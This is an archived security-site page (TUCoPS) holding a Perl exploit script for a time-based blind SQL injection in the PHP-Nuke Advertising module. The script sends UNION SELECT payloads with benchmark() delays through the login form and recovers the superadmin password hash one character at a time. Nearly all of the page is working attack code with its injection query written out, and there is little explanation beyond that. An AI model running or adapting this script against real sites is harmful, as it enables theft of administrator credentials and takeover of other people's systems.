Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: tb13366.htm

PHP-Nuke Module Advertising Blind SQL Injection



PHP-Nuke Module Advertising Blind SQL Injection
PHP-Nuke Module Advertising Blind SQL Injection



#!/usr/bin/perl =0D
#Product: PHP-Nuke Module Advertising=0D
#BugFounder: 0x90=0D
#HomePage: WwW.0x90.COM.Ar=0D 
#Problem: Blind SQL Injection=0D
=0D
 =0D
=0D
use strict;=0D
use warnings;=0D
use LWP;=0D
use Time::HiRes;=0D
use IO::Socket;=0D
=0D
=0D
my $host = "http://[url]/modules.php?name=Advertising";=0D 
=0D
my $useragent = LWP::UserAgent->new;=0D
my $metodo = HTTP::Request->new(POST => $host);=0D
=0D
my $post;=0D
my $inicio;=0D
my $risposta;=0D
my $fine;=0D
my $tiempodefault;=0D
my $tiempo;=0D
my $i;=0D
my $j;=0D
my $hash;=0D
my @array;=0D
=0D
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);=0D
=0D
=0D
$post="login=a&pass=a&op=client_valid";=0D
$tiempodefault=richiesta($post);=0D
$hash="";=0D
=0D
=0D
#QUERY RISULTANTE    =0D
=0D
#SELECT * FROM nuke_banner_clients WHERE login='a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`,1,1))=112),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1/*=0D
=0D
 =0D
for ($i=1;$i<33;$i++) =0D
 {=0D
 for ($j=0;$j<16;$j++) =0D
 {=0D
  $post="login=a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`," . $i . ",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1/*&pass=a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`," . $i . ",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1/*&op=client_valid";=0D
  $tiempo=richiesta($post);=0D
  aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);=0D
  if($tiempo>10)=0D
  {=0D
   $tiempo=richiesta($post);=0D
   aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);=0D
   if($tiempo>10)=0D
   {=0D
    $hash .=chr($array[$j]);=0D
    aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);=0D
    $j=200;=0D
   }=0D
  }=0D
=0D
  =0D
 }=0D
 if($i==1)=0D
 {=0D
  if($hash eq "")=0D
  {=0D
   $i=200;=0D
   print "El atake Fallo\n";=0D
  }=0D
 }=0D
}=0D
=0D
=0D
 print "Atake Terminado\n\n";=0D
=0D
system("pause");=0D
=0D
=0D
sub richiesta{=0D
 $post=$_[0];=0D
 $metodo->content_type('application/x-www-form-urlencoded');=0D
   $metodo->content($post);=0D
 $inicio=Time::HiRes::time();=0D
 $risposta=$useragent->request($metodo);=0D
 $risposta->is_success or die "$host : ",$risposta->message,"\n";=0D
 $fine=Time::HiRes::time();=0D
 $tiempo=$fine-$inicio;=0D
 return $tiempo=0D
}=0D
=0D
sub aggiorna{=0D
 system("cls");=0D
 @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);=0D
 print "PHP-Nuke Module Advertising Blind SQL Injection\n";=0D
 print "by 0x90\n";=0D
print "Visit: WwW.0x90.CoM.Ar\n\n";=0D 
 print "Victima : " . $_[0] . "\n";=0D
 print "Tiempo Default : " . $_[1] . " secondi\n";=0D
 print "Hash Bruteforce : " . chr($array[$_[2]]) . "\n";=0D
 print "Bruteforce n Caracter Hash : " . $_[5] . "\n";=0D
 print "Tiempo sql : " . $_[4] . " secondi\n";=0D
 print "Hash : " . $_[3] . "\n";=0D
}


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH